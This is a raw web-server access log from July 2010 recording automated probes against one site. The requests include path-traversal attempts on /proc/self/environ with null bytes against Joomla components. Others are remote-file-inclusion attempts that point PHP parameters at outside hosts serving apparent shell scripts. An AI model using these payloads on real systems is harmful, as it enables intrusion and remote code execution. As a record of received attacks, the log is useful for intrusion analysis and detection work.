110.232.72.18 - - [31/Jul/2010:06:06:20 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
203.147.55.140 - - [31/Jul/2010:06:06:31 -0700] "GET /logs/access_100429.log//skin/ggambo7002_board/comment_modify.php?dir=http://surtifruverdelasabana.com/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:10:52 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:10:56 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:12:15 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:12:40 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:12:47 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:12:51 -0700] "GET /logs//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:12:51 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:12:52 -0700] "GET /logs//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:12:53 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:06:13:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:06:13:18 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:06:13:25 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:14:36 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:14:43 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:15:16 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:15:19 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
203.147.55.140 - - [31/Jul/2010:06:15:21 -0700] "GET /logs/access_100429.log//skin/ggambo7002_board/comment_modify.php?dir=http://surtifruverdelasabana.com/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:15:26 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:15:29 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:18:43 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:18:56 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:18:56 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:18:57 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:18:57 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:19:24 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:20:13 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:20:23 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:20:42 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:20:42 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
216.104.37.106 - - [31/Jul/2010:06:22:46 -0700] "GET /logs////index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.104.37.106 - - [31/Jul/2010:06:22:46 -0700] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:22:51 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:23:02 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
94.23.215.207 - - [31/Jul/2010:06:23:12 -0700] "GET /logs//?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.215.207 - - [31/Jul/2010:06:23:12 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.215.207 - - [31/Jul/2010:06:23:13 -0700] "GET /?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:24:18 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
94.23.215.207 - - [31/Jul/2010:06:24:40 -0700] "GET /?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.215.207 - - [31/Jul/2010:06:24:40 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.215.207 - - [31/Jul/2010:06:24:43 -0700] "GET /logs//?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:24:45 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:25:01 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:25:04 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
208.69.56.95 - - [31/Jul/2010:06:25:39 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
208.69.56.95 - - [31/Jul/2010:06:25:39 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
208.69.56.95 - - [31/Jul/2010:06:25:39 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:26:02 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:26:02 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:26:02 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:27:21 -0700] "GET /logs/access.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:27:21 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:27:22 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:08 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:08 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:09 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:40 -0700] "GET /logs/access.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:40 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:43 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:43 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:29:44 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
200.29.171.35 - - [31/Jul/2010:06:31:34 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
200.29.171.35 - - [31/Jul/2010:06:31:35 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
200.29.171.35 - - [31/Jul/2010:06:31:35 -0700] "GET /logs/access_100429.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:31:57 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:32:01 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:32:01 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:33:00 -0700] "GET /logs/access.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:33:01 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:33:04 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
222.255.121.216 - - [31/Jul/2010:06:36:03 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.255.121.216 - - [31/Jul/2010:06:36:03 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.255.121.216 - - [31/Jul/2010:06:36:03 -0700] "GET /?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.255.121.216 - - [31/Jul/2010:06:36:48 -0700] "GET /?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.255.121.216 - - [31/Jul/2010:06:36:48 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.255.121.216 - - [31/Jul/2010:06:36:48 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:38:58 -0700] "GET /logs/access_100601.log//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:38:59 -0700] "GET /logs/access_100601.log//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:38:59 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:39:00 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:39:00 -0700] "GET /logs//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.195.185.200 - - [31/Jul/2010:06:39:00 -0700] "GET /logs//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.73.227.25 - - [31/Jul/2010:06:40:42 -0700] "GET /logs/access.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.73.227.25 - - [31/Jul/2010:06:40:42 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.73.227.25 - - [31/Jul/2010:06:40:46 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.73.227.25 - - [31/Jul/2010:06:40:50 -0700] "GET /logs/access.log%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:06:41:39 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:06:41:39 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:06:41:39 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:06:46:07 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:06:46:07 -0700] "GET /?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:06:46:07 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:46:34 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
208.69.56.95 - - [31/Jul/2010:06:48:37 -0700] "GET /logs/access_100601.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:49:04 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:06:50:22 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:53:39 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:53:40 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:06:53:40 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
91.121.144.61 - - [31/Jul/2010:06:57:04 -0700] "GET /logs/access_100429.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.144.61 - - [31/Jul/2010:06:57:04 -0700] "GET /index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
